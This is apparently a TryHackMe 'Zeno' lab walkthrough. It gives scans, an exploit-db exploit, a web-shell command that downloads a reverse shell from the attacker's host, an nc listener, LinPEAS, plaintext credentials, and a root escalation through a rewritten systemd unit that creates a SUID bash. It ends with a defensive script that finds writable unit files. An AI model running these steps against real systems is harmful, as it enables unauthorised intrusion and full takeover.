Zeno
Room Link: https://tryhackme.com/room/zeno
Scans
Initial scan
Kali
nmap -A $VICTIM
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/12340 - HTTP
Kali
gobuster dir -u http://$VICTIM:12340 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Restaurant Management System Exploit
Exploit: https://www.exploit-db.com/raw/47520
The code needed some fixing up
From

To

Kali
python exploit.py http://$VICTIM:12340/rms/

Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php
Kali
python2 -m SimpleHTTPServer 81
Browser
http://$VICTIM:12340/rms/images/reverse-shell.php?cmd=curl%20-O%20http://10.10.57.58:81/php-reverse-shell.php
Kali
nc -lvnp 1337
Browser


Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
LinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python2 -m SimpleHTTPServer 81
Victim
cd /tmp/
curl -O http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
MySQL
Victim
mysql -u root -pveerUffIrangUfcubyig
Victim(mysql)
show databases;
use dbrms;
show tables;
select * from members;

Edward's password was still not found

I went back to linpeas and found another password; it's for a different user, but it still worked.

TCP/22 - SSH
Kali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
Victim(edward)
sudo -l
Victim(apache)
find /etc -type f -perm /g=w -exec ls -l {} + 2> /dev/null
Victim(apache)
vi /etc/systemd/system/zeno-monitoring.service
From

To
[Unit]
Description=Zeno monitoring
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/edward/bash_root; chmod +xs /home/edward/bash_root'
[Install]
WantedBy=multi-user.target
Victim(edward)
sudo /usr/sbin/reboot
Kali
ssh edward@$VICTIM
Password: FrobjoodAdkoonceanJa
Victim(edward)
ls -lah
./bash_root -p
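Defender's view
The escalation above depends on a unit file under /etc/systemd/system that a non-root account can write. The script below is an added example, not part of the original write-up, that lists such files so they can be locked down; the function name list_weak_units and the suffix list are assumptions, and GNU find is assumed.

```shell
#!/bin/sh
# Added example (not from the write-up): list systemd unit files that an
# unprivileged account could modify. Assumes GNU find, whose -perm /MODE
# syntax is the same one used in the find command above.

# list_weak_units DIR [OWNER]
#   Prints every unit file (or drop-in .conf) under DIR that is writable by
#   group or others, or that is not owned by OWNER (default root; a numeric
#   uid is accepted). Symlinked units are followed to the real file.
list_weak_units() {
    dir=$1
    owner=${2:-root}
    find -L "$dir" -type f \
        \( -name '*.service' -o -name '*.timer' -o -name '*.socket' \
           -o -name '*.path' -o -name '*.mount' -o -name '*.conf' \) \
        \( -perm /022 -o ! -user "$owner" \) -print | sort
}

# When directories are passed on the command line, show each finding with
# its mode and owner so it can be reset (root:root, mode 644).
if [ "$#" -gt 0 ]; then
    for d in "$@"; do
        list_weak_units "$d" | while IFS= read -r f; do ls -l "$f"; done
    done
fi
```

Run it as root with /etc/systemd/system and /usr/lib/systemd/system as arguments; any path it prints is a unit that something other than root can rewrite.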